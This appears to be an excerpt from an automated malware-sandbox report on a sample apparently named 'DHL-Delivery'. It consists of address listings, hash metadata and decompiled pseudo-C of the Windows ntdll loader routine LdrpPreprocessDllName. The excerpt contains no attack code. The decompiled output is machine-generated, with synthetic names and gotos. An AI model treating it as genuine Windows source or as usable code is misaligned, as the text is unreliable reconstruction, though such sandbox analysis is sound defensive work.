                        0x1e105829
                        0x1e105830
                        0x1e105832
                        0x1e10583a
                        0x1e105840
                        0x1e105846
                        0x1e10528a
                        0x1e10528c
                        0x1e1052ef
                        0x1e1052ef
                        0x1e105302
                        0x1e14ad88
                        0x1e14ad93
                        0x1e14ada5
                        0x1e14ada7
                        0x1e14adb1
                        0x1e14adb1
                        0x1e105311
                        0x1e105314
                        0x1e105325
                        0x1e10532e
                        0x1e105338
                        0x1e105342
                        0x1e105355
                        0x1e10535e
                        0x1e105370
                        0x1e10537e
                        0x1e105389
                        0x1e105393
                        0x1e1053a0
                        0x1e14adc9
                        0x1e14add2
                        0x1e14add6
                        0x1e14add6
                        0x1e1053a6
                        0x1e1053b3
                        0x1e1053c0
                        0x1e1053ca
                        0x1e1053d6
                        0x1e1053db
                        0x1e1053de
                        0x1e1053e6
                        0x1e1053eb
                        0x1e1053ee
                        0x1e1053f6
                        0x1e1053fb
                        0x1e1053fe
                        0x1e105406
                        0x1e10540b
                        0x1e10540e
                        0x1e105417
                        0x1e10543b
                        0x1e105447
                        0x1e105453
                        0x1e10549c
                        0x1e14acf2
                        0x1e14acf2
                        0x00000000
                        0x1e14acf2
                        0x1e1054ae
                        0x1e105854
                        0x1e105859
                        0x1e1054b4
                        0x1e1054b7
                        0x1e1054ba
                        0x1e1054c8
                        0x1e1054ce
                        0x1e1054d9
                        0x1e1054e6
                        0x1e1054f6
                        0x1e105505
                        0x1e105517
                        0x1e105529
                        0x1e105538
                        0x1e10554d
                        0x1e105562
                        0x1e10556e
                        0x1e10557e
                        0x1e10558a
                        0x1e105591
                        0x1e14ade7
                        0x1e14ade7
                        0x1e105597
                        0x1e10559d
                        0x1e1055a9
                        0x1e14adef
                        0x1e14adff
                        0x1e1055af
                        0x1e1055af
                        0x1e1055bf
                        0x1e1055bf
                        0x1e1055c9
                        0x1e1055d3
                        0x1e14ae0e
                        0x1e14ae15
                        0x1e14ae15
                        0x1e1055d9
                        0x1e1055e7
                        0x1e1055f4
                        0x1e105600
                        0x1e10560c
                        0x1e105614
                        0x1e105618
                        0x1e105626
                        0x1e105670
                        0x1e10567a
                        0x1e105689
                        0x00000000
                        0x00000000
                        0x1e10568f
                        0x1e105694
                        0x1e10569b
                        0x1e14ae29
                        0x1e1056a1
                        0x1e1056a1
                        0x1e1056a1
                        0x1e1056a6
                        0x1e14ae33
                        0x1e14ae39
                        0x1e14ae40
                        0x00000000
                        0x00000000
                        0x1e14ae4b
                        0x1e14ae4d
                        0x1e14ae58
                        0x1e14ae58
                        0x1e14ae58
                        0x1e14ae6e
                        0x1e14ae7c
                        0x00000000
                        0x1e1056ac
                        0x1e1056ac
                        0x1e1056ac
                        0x1e1056b2
                        0x1e1056b2
                        0x1e1056b7
                        0x1e1056be
                        0x1e14ae8f
                        0x1e1056c4
                        0x1e1056c4
                        0x1e1056c4
                        0x1e1056c9
                        0x1e14ae9e
                        0x1e14aea0
                        0x1e14aeab
                        0x1e14aeab
                        0x1e14aeab
                        0x1e14aec9
                        0x1e14aec9
                        0x1e1056d6
                        0x1e14aedc
                        0x1e1056dc
                        0x1e1056dc
                        0x1e1056dc
                        0x1e1056e4
                        0x1e14aef3
                        0x1e14aef3
                        0x1e1056f0
                        0x1e1056fd
                        0x1e105703
                        0x1e105709
                        0x00000000
                        0x1e105709
                        0x1e105628
                        0x1e105643
                        0x1e10564f
                        0x1e105657
                        0x00000000
                        0x00000000
                        0x1e10565f
                        0x1e105660
                        0x1e105669
                        0x00000000
                        0x1e105669
                        0x1e10541e
                        0x1e10541e
                        0x1e105432
                        0x00000000
                        0x00000000
                        0x1e105438
                        0x00000000
                        0x1e105438
                        0x1e105417
                        0x1e105290
                        0x1e105298
                        0x1e105299
                        0x1e1052a4
                        0x1e1052a5
                        0x1e1052ac
                        0x1e1052ad
                        0x1e1052b6
                        0x00000000
                        0x00000000
                        0x1e1052c3
                        0x1e14ad40
                        0x1e1052c9
                        0x1e1052c9
                        0x1e1052c9
                        0x1e1052d1
                        0x1e14ad4b
                        0x1e14ad51
                        0x1e14ad58
                        0x1e14ad72
                        0x1e14ad72
                        0x1e14ad58
                        0x1e1052e3
                        0x1e1052e9
                        0x00000000
                        0x1e1052e9
                        0x1e105774
                        0x1e105775
                        0x1e10577d
                        0x1e10577e
                        0x1e10577f
                        0x1e105780
                        0x1e105782
                        0x1e105787
                        0x1e105789
                        0x00000000
                        0x00000000
                        0x1e10578f
                        0x1e105795
                        0x1e10579b
                        0x1e10579d
                        0x00000000
                        0x00000000
                        0x1e1057a3
                        0x1e1057ad
                        0x00000000
                        0x00000000
                        0x1e1057b5
                        0x1e1057c0
                        0x1e1057c6
                        0x1e105892
                        0x1e105898
                        0x1e10589e
                        0x1e1058a4
                        0x1e1058a6
                        0x1e1058bb
                        0x1e1058bd
                        0x1e1058bd
                        0x1e1058a8
                        0x1e1058aa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e1058aa
                        0x1e1057cc
                        0x1e1057d2
                        0x1e1057d8
                        0x1e14ad0b
                        0x1e14ad12
                        0x00000000
                        0x00000000
                        0x1e14ad14
                        0x1e1057e1
                        0x1e1057e6
                        0x1e1057e9
                        0x1e1057ea
                        0x1e1057f2
                        0x1e1057f3
                        0x1e1057f5
                        0x1e1057f6
                        0x1e1057f8
                        0x1e1057fd
                        0x1e1057ff
                        0x00000000
                        0x00000000
                        0x1e10580b
                        0x1e105811
                        0x1e105817
                        0x1e10581d
                        0x1e10581d
                        0x1e105823
                        0x00000000
                        0x1e105823
                        0x1e105194
                        0x1e10519a
                        0x1e1051a6
                        0x1e14ad19
                        0x1e14ad1b
                        0x00000000
                        0x1e14ad1b
                        0x1e1051b1
                        0x1e1051c1
                        0x1e1051c4
                        0x1e1051ca
                        0x1e1051d0
                        0x1e1051d2
                        0x1e1051da
                        0x1e14ad26
                        0x1e14ad2c
                        0x1e14ad2c
                        0x1e1051e0
                        0x1e1051e8
                        0x1e1051f2
                        0x1e1051fa
                        0x1e1051fb
                        0x1e105206
                        0x1e105207
                        0x1e10520e
                        0x1e10520f
                        0x1e105218
                        0x00000000
                        0x1e10521e
                        0x1e10521e
                        0x1e105224
                        0x1e105230
                        0x1e10523d
                        0x1e105251
                        0x1e10525c
                        0x1e105262
                        0x1e105274
                        0x1e105274
                        0x1e10527a
                        0x1e10527c
                        0x1e105282
                        0x1e105284
                        0x00000000
                        0x1e105284
                        0x1e105218
                        0x1e14aca6
                        0x00000000
                        0x1e14aca6
                        0x1e10515d
                        0x1e14ac96
                        0x1e14ac9b
                        0x1e14ac9b
                        0x1e105167
                        0x1e10516b
                        0x1e105175
                        0x1e10517a
                        0x1e105180
                        0x00000000
                        0x1e105180
                        0x1e10512a
                        0x1e105095
                        0x1e105071
                        0x1e104f9a
                        0x1e14ab03
                        0x1e14ab09
                        0x00000000
                        0x00000000
                        0x1e14ab0f
                        0x1e14ab15
                        0x1e14ab18
                        0x1e14ab37
                        0x1e14ab3c
                        0x1e14ab1a
                        0x1e14ab2f
                        0x1e14ab34
                        0x1e14ab42
                        0x1e14ab47
                        0x1e14ab4d
                        0x1e14ab53
                        0x1e14ab57
                        0x1e14ab58
                        0x1e14ab58
                        0x1e14ab5d
                        0x1e14ab5d
                        0x1e104fa6
                        0x1e14ab6e
                        0x1e14ab6e
                        0x00000000
                        0x1e104fa6
                        0x1e14aa1b
                        0x1e14aa1f
                        0x1e14aa24
                        0x1e14aa26
                        0x00000000
                        0x00000000
                        0x1e14aa2c
                        0x00000000
                        0x1e14aa2c
                        0x1e104f7d
                        0x1e14aa37
                        0x1e14aa3a
                        0x00000000
                        0x00000000
                        0x1e14aa40
                        0x1e14aa46
                        0x00000000
                        0x00000000
                        0x1e14aa4c
                        0x1e14aa4e
                        0x1e14aa5f
                        0x1e14aa5f
                        0x1e14aa65
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e14aa65
                        0x1e14aa52
                        0x1e14aa57
                        0x1e14aa59
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e14aa59
                        0x00000000

                        APIs
                        • RtlDebugPrintTimes.NTDLL ref: 1E14A9B4
                          • Part of subcall function 1E120600: LdrInitializeThunk.NTDLL ref: 1E12060A
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugInitializePrintThunkTimes
                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                        • API String ID: 3681346633-3570731704
                        • Opcode ID: 3d805a5c118a7377f82d947acbfd8d26026fdcca00b22c0dd13fc34d62a739a2
                        • Instruction ID: 1e9381bf2130094d6be075f7b791930d3154889cb962635eec2c3b1c15e16a0e
                        • Opcode Fuzzy Hash: 3d805a5c118a7377f82d947acbfd8d26026fdcca00b22c0dd13fc34d62a739a2
                        • Instruction Fuzzy Hash: 96824A75A01269CFEB24CF19C990B99B7B6BF44310F2682E9E849A7395D7309EC0CF51
                        Uniqueness

                        Uniqueness Score: 12.89%

                        Function 1E0EDF40, Relevance: 9.2, Strings: 7, Instructions: 478UNIQUECrypto
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E1E0EDF40(unsigned short __ecx, unsigned short __edx, signed int _a4, unsigned short _a8) {
				signed int _v8;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				unsigned short _v556;
				signed int _v560;
				unsigned short _v564;
				signed int _v568;
				signed int _v570;
				signed int _v572;
				char* _v576;
				signed short _v580;
				intOrPtr _v584;
				intOrPtr _v586;
				char _v588;
				char _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				char _v608;
				char _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t130;
				char* _t131;
				signed int _t134;
				signed int _t136;
				signed short* _t158;
				short* _t162;
				signed short* _t165;
				unsigned int _t175;
				signed int _t179;
				intOrPtr* _t183;
				intOrPtr* _t184;
				intOrPtr* _t188;
				char* _t189;
				char _t198;
				intOrPtr _t204;
				signed char* _t206;
				signed int _t213;
				short* _t214;
				signed int _t219;
				signed char* _t227;
				unsigned short _t233;
				signed int _t239;
				intOrPtr _t240;
				unsigned short _t249;
				void* _t252;
				intOrPtr _t255;
				intOrPtr _t261;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed short* _t270;
				unsigned short _t272;
				intOrPtr _t273;
				signed int _t274;
				void* _t275;

				_t234 = __ecx;
				_v8 =  *0x1e1d6360 ^ _t274;
				_t266 = _a4;
				_t233 = __edx;
				_v564 = _a8;
				_v556 = __ecx;
				if(E1E0EF780(0,  &_v592) < 0) {
					_v552 = 0;
				} else {
					_v552 = 1;
				}
				_t254 = _v564;
				_t130 = 0;
				_t269 = 0;
				_v549 = 0;
				if(( *_t254 & 0x00800008) != 0) {
					L23:
					_t267 = _v556;
					_v560 = _t267;
					if( *_t233 != 0) {
						if(( *0x1e1ce7b0 & 0x00000005) != 0) {
							_t131 = "SxS";
							if(_t130 == 0) {
								_t131 = "API set";
							}
							_push(_t131);
							_push(_t233);
							E1E15BDA0("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t267);
							_t254 = _v564;
							_t275 = _t275 + 0x20;
						}
						_t134 =  *_t254 | 0x00000200;
						 *_t254 = _t134;
						if(_v549 != 0) {
							 *_t254 = _t134 | 0x00000004;
						}
						_t136 = _t233;
						_v560 = _t136;
						L34:
						if(_t269 < 0) {
							goto L110;
						}
						if(( *_t254 & 0x00000200) != 0) {
							_v580 = 0x2140000;
							_v576 =  &_v548;
							E1E0ED940(_t234,  &_v580, E1E0ED3A0());
							_t267 = _v580 & 0x0000ffff;
							E1E0ED940(_t234,  &_v580, L"\\SysWOW64");
							if(E1E0E5370(_t234,  &_v580, _t233, 1) != 0) {
								_v588 =  *_t233;
								_v588 = _v588 - _t267;
								_v586 = _v586 - _t267;
								_v584 =  *((intOrPtr*)(_t233 + 4)) + (_t267 >> 1) * 2;
								E1E0E2EA0( &_v588, 0x14c, 1, 0);
							}
							_t136 = _v560;
						}
						_t254 =  *(_t136 + 4);
						_t158 = ( *_t136 & 0x0000ffff) + 0xfffffffe + _t254;
						if(_t158 < _t254) {
							L42:
							_t254 = 0x1e0b10e8;
							_t269 = E1E0EDEE0(_t233, 0x1e0b10e8);
							goto L47;
						} else {
							while(1) {
								_t239 =  *_t158 & 0x0000ffff;
								if(_t239 == 0x2e) {
									break;
								}
								if(_t239 != 0x5c && _t239 != 0x2f) {
									_t158 = _t158 - 2;
									if(_t158 >= _t254) {
										continue;
									}
								}
								goto L42;
							}
							_t240 =  *((intOrPtr*)(_t233 + 4));
							_t162 = ( *_t233 & 0x0000ffff) + 0xfffffffe + _t240;
							if(_t162 < _t240) {
								L46:
								 *((short*)(_t162 + 2)) = 0;
								L47:
								if(_t269 < 0) {
									goto L110;
								}
								goto L48;
							} else {
								while( *_t162 == 0x2e) {
									_t254 = 0xfffe;
									_t162 = _t162 - 2;
									 *_t233 =  *_t233 + 0xfffe;
									if(_t162 >= _t240) {
										continue;
									}
									goto L46;
								}
								goto L46;
							}
						}
					}
					_t255 =  *((intOrPtr*)(_t267 + 4));
					_t165 = ( *_t267 & 0x0000ffff) + 0xfffffffe + _t255;
					if(_t165 < _t255) {
						L29:
						_t254 = _v564;
						_t269 = 0;
						 *_t254 =  *_t254 | 0x00000020;
						_t166 =  *_t267 & 0x0000ffff;
						if(( *_t267 & 0x0000ffff) == 0) {
							goto L33;
						} else {
							_t234 = _t233;
							_t269 = E1E0ED37F(_t233, _t166 + 2 + ( *_t233 & 0x0000ffff));
							if(_t269 >= 0) {
								E1E126370(( *_t233 & 0x0000ffff) +  *((intOrPtr*)(_t233 + 4)),  *((intOrPtr*)(_t267 + 4)),  *_t267 & 0x0000ffff);
								_t275 = _t275 + 0xc;
								_t175 =  *_t233 +  *_t267 & 0x0000ffff;
								 *_t233 = _t175;
								_t234 = _t175 >> 1;
								 *((short*)( *((intOrPtr*)(_t233 + 4)) + (_t175 >> 1) * 2)) = 0;
							}
							goto L32;
						}
					} else {
						while(1) {
							_t234 =  *_t165 & 0x0000ffff;
							if(_t234 == 0x5c || _t234 == 0x2f) {
								break;
							}
							_t165 = _t165 - 2;
							if(_t165 >= _t255) {
								continue;
							}
							goto L29;
						}
						if(E1E0E2CD1(_t267) == 5) {
							_t234 = _t233;
							_t269 = E1E0EDEE0(_t233, _t267);
							L32:
							_t254 = _v564;
							L33:
							_t136 = _t267;
							goto L34;
						}
						_t234 = _t267;
						_t179 = E1E0E596D(_t267, _t233);
						_t254 = _v564;
						_t269 = _t179;
						_t136 = _t267;
						if(_t269 < 0) {
							goto L110;
						}
						 *_t254 =  *_t254 | 0x00000600;
						goto L34;
					}
				} else {
					_t261 =  *[fs:0x30];
					_t12 = _t266 + 0x2c; // 0x1e1b8a94
					_t270 = _v556;
					_t234 = 0;
					_v560 = _t270;
					_v600 = _t261;
					asm("sbb edi, edi");
					_v549 = 0;
					_t267 =  ~_t266 & _t12;
					_v551 = 1;
					_v596 =  *((intOrPtr*)(_t261 + 0x38));
					_t183 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t183 != 0) {
						if( *_t183 == 0) {
							goto L4;
						}
						_t184 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						L5:
						if( *_t184 != _t234) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E1E0F5440() == 0) {
									_t227 = 0x7ffe0385;
								} else {
									_t227 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t227 & 0x00000020) != 0) {
									_t234 = 0x14d0;
									E1E15D913(0x14d0, 0, 0, 0, _t270, 0);
								}
							}
						}
						_t254 =  *_t270 & 0x0000ffff;
						_v572 = 0;
						_v568 = 0;
						_v550 = 0;
						if(_t254 < 8) {
							L12:
							_t188 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
							if(_t188 != 0) {
								if( *_t188 == 0) {
									goto L13;
								}
								_t189 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								L14:
								if( *_t189 != 0) {
									if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
										if(E1E0F5440() == 0) {
											_t206 = 0x7ffe0385;
										} else {
											_t206 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
										}
										if(( *_t206 & 0x00000020) != 0) {
											_t254 = 0;
											_t234 = 0x14d3;
											E1E15D913(0x14d3, 0, 0, 0, _t270, 0);
										}
									}
								}
								goto L15;
							}
							L13:
							_t189 = 0x7ffe0384;
							goto L14;
						} else {
							_t272 = _t270[2];
							_t234 =  *_t272 & 0xffdfffdf;
							_t213 =  *(_t272 + 4) & 0xffffffdf;
							if(_t234 != 0x500041 || _t213 != 0x2d0049) {
								if(_t234 != 0x580045 || _t213 != 0x2d0054) {
									goto L11;
								} else {
									goto L56;
								}
							} else {
								L56:
								_t249 = _t254;
								_t214 = _t249 + _t272;
								if(_t249 <= 1) {
									L59:
									_t234 = _t249 >> 1;
									_t215 = _t249 >> 0x00000001 & 0x0000ffff;
									if((_t249 >> 0x00000001 & 0x0000ffff) == 0) {
										L11:
										_t270 = _v556;
										goto L12;
									}
									_t254 = _t272;
									_t273 = _v596;
									_t234 = E1E0FA310(_t273, _t272, _t215);
									if(_t234 == 0) {
										goto L11;
									}
									if(_t267 == 0 ||  *((intOrPtr*)(_t234 + 0x14)) <= 1) {
										if( *((intOrPtr*)(_t234 + 0x14)) <= 0) {
											goto L11;
										}
										_t252 =  *((intOrPtr*)(_t234 + 0x10)) + _t273;
										goto L65;
									} else {
										_t89 = _t267 + 4; // 0x0
										_t252 = E1E0EDBAA(_t234,  *_t89,  *_t267 >> 0x00000001 & 0x0000ffff, _t273);
										L65:
										_t254 = _v556;
										_v568 =  *((intOrPtr*)(_t252 + 0xc)) + _t273;
										_t219 =  *(_t252 + 0x10) & 0x0000ffff;
										_t234 = 0;
										_v570 = _t219;
										_v572 = _t219;
										_v550 = 1;
										if(_t219 == 0) {
											E1E0ED906(0, _t254, 0x14d2);
											L93:
											_t269 = 0xc0000481;
											L21:
											if(_t269 < 0) {
												L110:
												if(( *0x1e1ce7b0 & 0x00000003) != 0) {
													_push(_t269);
													E1E15BDA0("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _v556);
												}
												if(( *0x1e1ce7b0 & 0x00000010) != 0) {
													asm("int3");
												}
												L48:
												if(_v552 != 0) {
													E1E0EF780(_v592,  &_v592);
												}
												return E1E1225C0(_t269, _t233, _v8 ^ _t274, _t254, _t267, _t269);
											} else {
												_t130 = _v549;
												_t254 = _v564;
												goto L23;
											}
										}
										E1E0ED906(0, _t254, 0x14d1);
										L15:
										if(_v550 != 0) {
											if(_v572 == 0) {
												goto L93;
											}
											 *_t233 = 0;
											E1E122AC0(_t234,  &_v616, E1E0ED3A0());
											E1E0EDEE0(_t233,  &_v616);
											E1E0EDEE0(_t233, 0x1e0b122c);
											_t254 =  &_v572;
											_t269 = E1E0EDEE0(_t233,  &_v572);
											if(_t269 < 0) {
												_t198 = _v551;
												_t234 = _v560;
											} else {
												_t204 =  *((intOrPtr*)(_v600 + 0x10));
												if(_t204 == 0 || ( *(_t204 + 8) & 0x00001000) == 0) {
													_t198 = 0;
												} else {
													_t198 = 1;
												}
												_t234 = _t233;
											}
											if(_t269 >= 0) {
												goto L17;
											} else {
												goto L110;
											}
										} else {
											_t198 = _v551;
											_t234 = _v560;
											L17:
											if(_t198 != 0 &&  *0x1e1d0c1c == 0) {
												_t267 = E1E0EFD60(1, _t234, 0x1e0b10e8, 0,  &_v608, 0, 0, 0, 0);
												if(_t267 >= 0) {
													_t254 = _t233;
													_v549 = 1;
													E1E0E596D( &_v608, _t233);
													_t234 =  &_v608;
													E1E0E36A5( &_v608);
												}
												if(_t267 != 0xc0150008) {
													_t269 = _t267;
												}
											}
											goto L21;
										}
									}
								} else {
									goto L57;
								}
								do {
									L57:
									_t214 = _t214 - 2;
									_t249 = _t249 - 2;
								} while ( *_t214 != 0x2d && _t249 > 1);
								goto L59;
							}
						}
					}
					L4:
					_t184 = 0x7ffe0384;
					goto L5;
				}
			}































































                        0x1e0edf40
                        0x1e0edf52
                        0x1e0edf5b
                        0x1e0edf5e
                        0x1e0edf60
                        0x1e0edf6f
                        0x1e0edf7c
                        0x1e13f93f
                        0x1e0edf82
                        0x1e0edf82
                        0x1e0edf82
                        0x1e0edf89
                        0x1e0edf8f
                        0x1e0edf91
                        0x1e0edf93
                        0x1e0edf9f
                        0x1e0ee0e5
                        0x1e0ee0e9
                        0x1e0ee0ef
                        0x1e0ee0f5
                        0x1e0ee2a1
                        0x1e13fa55
                        0x1e13fa5a
                        0x1e13fa5c
                        0x1e13fa5c
                        0x1e13fa61
                        0x1e13fa62
                        0x1e13fa7a
                        0x1e13fa7f
                        0x1e13fa85
                        0x1e13fa85
                        0x1e0ee2a9
                        0x1e0ee2b5
                        0x1e0ee2b7
                        0x1e0ee4ac
                        0x1e0ee4ac
                        0x1e0ee2bd
                        0x1e0ee2bf
                        0x1e0ee18c
                        0x1e0ee18e
                        0x00000000
                        0x00000000
                        0x1e0ee19a
                        0x1e0ee23e
                        0x1e0ee248
                        0x1e0ee25b
                        0x1e0ee260
                        0x1e0ee273
                        0x1e0ee289
                        0x1e0ee443
                        0x1e0ee44b
                        0x1e0ee452
                        0x1e0ee467
                        0x1e0ee474
                        0x1e0ee474
                        0x1e0ee28f
                        0x1e0ee28f
                        0x1e0ee1a0
                        0x1e0ee1a9
                        0x1e0ee1ad
                        0x1e0ee1c9
                        0x1e0ee1c9
                        0x1e0ee1d5
                        0x00000000
                        0x1e0ee1b0
                        0x1e0ee1b0
                        0x1e0ee1b0
                        0x1e0ee1b6
                        0x00000000
                        0x00000000
                        0x1e0ee1bb
                        0x1e0ee1c2
                        0x1e0ee1c7
                        0x00000000
                        0x00000000
                        0x1e0ee1c7
                        0x00000000
                        0x1e0ee1bb
                        0x1e0ee1dc
                        0x1e0ee1e2
                        0x1e0ee1e6
                        0x1e0ee1fa
                        0x1e0ee1fc
                        0x1e0ee200
                        0x1e0ee202
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e0ee1e8
                        0x1e0ee1f0
                        0x1e13fa9d
                        0x1e13faa2
                        0x1e13faa5
                        0x1e13faaa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e13fab0
                        0x00000000
                        0x1e0ee1f0
                        0x1e0ee1e6
                        0x1e0ee1ad
                        0x1e0ee0fe
                        0x1e0ee104
                        0x1e0ee108
                        0x1e0ee12c
                        0x1e0ee12c
                        0x1e0ee132
                        0x1e0ee134
                        0x1e0ee137
                        0x1e0ee13d
                        0x00000000
                        0x1e0ee13f
                        0x1e0ee145
                        0x1e0ee14f
                        0x1e0ee153
                        0x1e0ee163
                        0x1e0ee16b
                        0x1e0ee171
                        0x1e0ee176
                        0x1e0ee17c
                        0x1e0ee180
                        0x1e0ee180
                        0x00000000
                        0x1e0ee153
                        0x1e0ee110
                        0x1e0ee110
                        0x1e0ee110
                        0x1e0ee116
                        0x00000000
                        0x00000000
                        0x1e0ee125
                        0x1e0ee12a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e0ee12a
                        0x1e0ee3f8
                        0x1e13fa8f
                        0x1e13fa96
                        0x1e0ee184
                        0x1e0ee184
                        0x1e0ee18a
                        0x1e0ee18a
                        0x00000000
                        0x1e0ee18a
                        0x1e0ee400
                        0x1e0ee402
                        0x1e0ee407
                        0x1e0ee40d
                        0x1e0ee40f
                        0x1e0ee413
                        0x00000000
                        0x00000000
                        0x1e0ee419
                        0x00000000
                        0x1e0ee419
                        0x1e0edfa5
                        0x1e0edfa5
                        0x1e0edfac
                        0x1e0edfaf
                        0x1e0edfb5
                        0x1e0edfb9
                        0x1e0edfbf
                        0x1e0edfc5
                        0x1e0edfc7
                        0x1e0edfcd
                        0x1e0edfcf
                        0x1e0edfd9
                        0x1e0edfe5
                        0x1e0edfea
                        0x1e13f94e
                        0x00000000
                        0x00000000
                        0x1e13f95d
                        0x1e0edff5
                        0x1e0edff7
                        0x1e13f974
                        0x1e13f981
                        0x1e13f993
                        0x1e13f983
                        0x1e13f98c
                        0x1e13f98c
                        0x1e13f99b
                        0x1e13f9aa
                        0x1e13f9af
                        0x1e13f9af
                        0x1e13f99b
                        0x1e13f974
                        0x1e0edffd
                        0x1e0ee002
                        0x1e0ee008
                        0x1e0ee00e
                        0x1e0ee017
                        0x1e0ee056
                        0x1e0ee05c
                        0x1e0ee061
                        0x1e13f9d0
                        0x00000000
                        0x00000000
                        0x1e13f9df
                        0x1e0ee06c
                        0x1e0ee06f
                        0x1e13f9f6
                        0x1e13fa03
                        0x1e13fa15
                        0x1e13fa05
                        0x1e13fa0e
                        0x1e13fa0e
                        0x1e13fa1d
                        0x1e13fa2a
                        0x1e13fa2c
                        0x1e13fa31
                        0x1e13fa31
                        0x1e13fa1d
                        0x1e13f9f6
                        0x00000000
                        0x1e0ee06f
                        0x1e0ee067
                        0x1e0ee067
                        0x00000000
                        0x1e0ee019
                        0x1e0ee019
                        0x1e0ee021
                        0x1e0ee027
                        0x1e0ee030
                        0x1e0ee043
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e0ee2ca
                        0x1e0ee2ca
                        0x1e0ee2ca
                        0x1e0ee2cc
                        0x1e0ee2d2
                        0x1e0ee2e5
                        0x1e0ee2e5
                        0x1e0ee2e8
                        0x1e0ee2ee
                        0x1e0ee050
                        0x1e0ee050
                        0x00000000
                        0x1e0ee050
                        0x1e0ee2f4
                        0x1e0ee2f6
                        0x1e0ee304
                        0x1e0ee308
                        0x00000000
                        0x00000000
                        0x1e0ee310
                        0x1e0ee320
                        0x00000000
                        0x00000000
                        0x1e0ee329
                        0x00000000
                        0x1e0ee424
                        0x1e0ee427
                        0x1e0ee437
                        0x1e0ee32b
                        0x1e0ee32e
                        0x1e0ee336
                        0x1e0ee33c
                        0x1e0ee340
                        0x1e0ee342
                        0x1e0ee349
                        0x1e0ee350
                        0x1e0ee35a
                        0x1e13f9be
                        0x1e13f9c3
                        0x1e13f9c3
                        0x1e0ee0d1
                        0x1e0ee0d3
                        0x1e13fab5
                        0x1e13fabc
                        0x1e13fabe
                        0x1e13fadb
                        0x1e13fae0
                        0x1e13faea
                        0x1e13faf0
                        0x1e13faf0
                        0x1e0ee208
                        0x1e0ee20f
                        0x1e0ee21e
                        0x1e0ee21e
                        0x1e0ee235
                        0x1e0ee0d9
                        0x1e0ee0d9
                        0x1e0ee0df
                        0x00000000
                        0x1e0ee0df
                        0x1e0ee0d3
                        0x1e0ee365
                        0x1e0ee075
                        0x1e0ee07e
                        0x1e0ee376
                        0x00000000
                        0x00000000
                        0x1e0ee37e
                        0x1e0ee38e
                        0x1e0ee39b
                        0x1e0ee3a7
                        0x1e0ee3ac
                        0x1e0ee3b9
                        0x1e0ee3bd
                        0x1e13fa42
                        0x1e13fa48
                        0x1e0ee3c3
                        0x1e0ee3c9
                        0x1e0ee3ce
                        0x1e0ee3dd
                        0x1e13fa3b
                        0x1e13fa3b
                        0x1e13fa3b
                        0x1e0ee3df
                        0x1e0ee3df
                        0x1e0ee3e3
                        0x00000000
                        0x1e0ee3e9
                        0x00000000
                        0x1e0ee3e9
                        0x1e0ee084
                        0x1e0ee084
                        0x1e0ee08a
                        0x1e0ee090
                        0x1e0ee092
                        0x1e0ee0bb
                        0x1e0ee0bf
                        0x1e0ee47e
                        0x1e0ee480
                        0x1e0ee48d
                        0x1e0ee492
                        0x1e0ee498
                        0x1e0ee498
                        0x1e0ee0cb
                        0x1e0ee4a2
                        0x1e0ee4a2
                        0x1e0ee0cb
                        0x00000000
                        0x1e0ee092
                        0x1e0ee07e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e0ee2d4
                        0x1e0ee2d4
                        0x1e0ee2d4
                        0x1e0ee2d7
                        0x1e0ee2da
                        0x00000000
                        0x1e0ee2d4
                        0x1e0ee030
                        0x1e0ee017
                        0x1e0edff0
                        0x1e0edff0
                        0x00000000
                        0x1e0edff0

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$\SysWOW64$minkernel\ntdll\ldrutil.c
                        • API String ID: 0-1558337705
                        • Opcode ID: 63b3d636637f3b1129ba545f54c3a0a5293fcdc560e5bfb52e5883e7afc58d87
                        • Instruction ID: 2c2c0b2fde048535aed22a8da2d0223e3164739c352d15460de89fbe352e5bf6
                        • Opcode Fuzzy Hash: 63b3d636637f3b1129ba545f54c3a0a5293fcdc560e5bfb52e5883e7afc58d87
